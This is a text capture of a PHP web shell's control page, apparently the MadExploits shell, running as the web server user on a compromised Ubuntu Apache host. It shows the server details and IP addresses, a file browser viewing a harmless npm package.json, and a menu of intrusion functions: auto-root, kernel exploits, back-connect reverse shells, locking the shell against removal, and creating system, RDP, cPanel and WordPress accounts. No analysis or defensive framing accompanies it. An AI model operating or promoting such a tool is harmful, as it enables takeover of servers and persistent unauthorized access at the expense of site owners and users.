Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.63.33
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
spdx-license-ids /
[ HOME SHELL ]
Name
Size
Permission
Action
deprecated.json
434
B
-rw-r--r--
index.json
5.17
KB
-rw-r--r--
package.json
736
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "spdx-license-ids", "version": "3.0.5", "description": "A list of SPDX license identifiers", "repository": "shinnn/spdx-license-ids", "author": "Shinnosuke Watanabe (https://github.com/shinnn)", "license": "CC0-1.0", "scripts": { "build": "node build.js", "pretest": "eslint .", "test": "node test.js" }, "files": [ "deprecated.json", "index.json" ], "keywords": [ "spdx", "license", "licenses", "id", "identifier", "identifiers", "json", "array", "oss" ], "devDependencies": { "@shinnn/eslint-config": "^6.8.7", "chalk": "^2.4.1", "eslint": "^5.10.0", "get-spdx-license-ids": "^2.1.0", "rmfr": "^2.0.0", "tape": "^4.9.1" }, "eslintConfig": { "extends": "@shinnn" } }
Close